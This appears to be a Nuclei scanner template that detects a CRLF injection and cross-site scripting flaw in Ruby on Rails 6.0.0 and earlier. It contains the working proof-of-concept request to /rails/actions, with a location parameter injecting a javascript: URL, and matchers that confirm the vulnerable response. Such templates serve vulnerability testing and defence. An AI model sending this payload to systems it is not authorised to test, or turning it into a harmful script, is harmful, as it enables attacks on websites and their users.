id: rails6-xss # XSS (6.0.0 -; Payload is location=%0djavascript:alert(1); # Nuclei has issues with 302 response missing a Location header thus the # extended payload to make Nuclei work. # Working poc by @Mad-robot # /rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0Djavascript%3Aalert%28document.domain%29 info: name: Ruby on Rails - CRLF Injection and Cross-Site Scripting author: ooooooo_q,rootxharsh,iamnoooob severity: medium description: Ruby on Rails 6.0.0- contains a CRLF issue which allows JavaScript to be injected into the response, resulting in cross-site scripting. reference: - tags: rails,xss,crlf,hackerone requests: - method: POST path: - "{{BaseURL}}/rails/actions?error=ActiveRecord::PendingMigrationError&action=Run%20pending%20migrations&location=%0djavascript:alert(1)//%0aaaaaa" matchers-condition: and matchers: - type: word words: - 'javascript:alert(1)' part: body - type: status status: - 302 - type: word words: - 'Location: aaaaa' - 'text/html' part: header condition: and # Enhanced by cs 09/23/2022